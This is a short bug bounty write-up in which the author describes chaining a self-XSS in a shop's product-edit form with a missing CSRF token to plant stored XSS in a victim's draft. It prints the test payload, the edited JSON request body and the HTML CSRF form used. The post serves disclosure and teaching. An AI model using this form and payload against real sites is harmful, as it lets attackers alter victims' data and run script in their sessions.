[Duplicated] Self-XSS & CSRF attack lead to Stored XSS

Hi guys

it’s me Flex, in this post I will share a new vulnerability on a private program let’s call it `example.com` the vulnerability was a Self-XSS with CSRF attack which leads to Stored XSS.

The story of the discovery

the target is a shop website when I test the function to add a product I start adding my lovely XSS payload <svg/onload=alert(0)> everywhere and one of them these fields work and give me a pop-up because the input was wrong to the field and the website tells me that this value is wrong so it is a self-XSS I tried to find Clickjacking to make it exploitable but there is no way with clickjacking, after some minutes I tried to find a CSRF attack so I opened my Burp and catch the change request and I notice that there is no CSRF-Token or any CSRF protection so I tried to exploit this two bugs together to get the Stored XSS, the body of the edited request was like that

{"basePage":{"draftIds":["victim_id"],"wsId":"-1","wsType":"-1"},"mode":"INDIVIDUAL","action":"SAVE","layerName":"EDITPANE","variation":null,"currencyInfo":{"currencySymbolLeft":true,"singularName":"U.S. dollars","moneySymbol":"$","decimalSymbol":".","groupingSymbol":",","gS":",","decimalPlaces":"2","currencyCode":"USD","pluralName":"U.S. dollar"},"singleList":true,"listingMode":"AddItem","fields":{"upc":"XSS_payload","":"true"},"updateRequired":true,"customFields":{},"byPassUpdate":false,"sellerType":"C2C","isAdd":"","saveUlsi":true,"edpCrNew":false,"deletedFields":[],"updateCrNew":true,"recentCategories":null,"suggestedCategories":["13718:Collectibles > Arcade, Jukeboxes & Pinball > Arcade Gaming > Replacement Parts","57988:Clothing, Shoes & Accessories > Mens Clothing > Coats & Jackets","217:Sports Mem, Cards & Fan Shop > Sports Trading Cards > Other Sports Trading Cards","48:Collectibles > Photographic Images > Contemporary (1940-Now) > Other Contemporary Photographs","75708:Toys & Hobbies > Action Figures > TV, Movie & Video Games"],"customAttributes":{"PL_OPT_IN":"0","PL_SELLER_ELIGIBLE":"1","PL_FORMAT_ELIGIBLE":"0","PL_CATEGORY_ELIGIBLE":"0","PL_ALREADY_OPTED":"0"},"draftMode":"Listing","restricted":false,"customPreference":{"preferences":{"scheduleStartTime":true,"reservePrice":true,"sellAsLot":true,"privateListing":true,"":true,"additionalPaymentOptions":true,"additionalCheckoutInstructions":true,"salesTax":true,"additionalReturnPolicyDetails":true,"internationalShipping":true,"shippingExclusionList":true,"shippingRateTable":true},"sellerDetails":["NO_STORE_SUBSCRIPTION","NO_SHIPPING_DISCOUNTS","NON_SM_SELLER"]},"payments20":false,"isvShown":false}

so just I want the victim draft id to use the CSRF attack to change the draft information and add the XSS payload, the CSRF code which I used it

<form action="https://exampl.com/endpoint" method="POST">
<input type="hidden" name="clientType" value="Firefox:66:">
<input type="hidden" name="request" value='[add_decode_value_here]'>
<input type="submit" value="send">
</form>

when I use this HTML code and add the request body above with the victim draft ID and the XSS payload BOOOM!! the field value will be changed and when the user visits his page again the XSS payload will be executed.

it was good to me but it was duplicated too :_(.

THE END.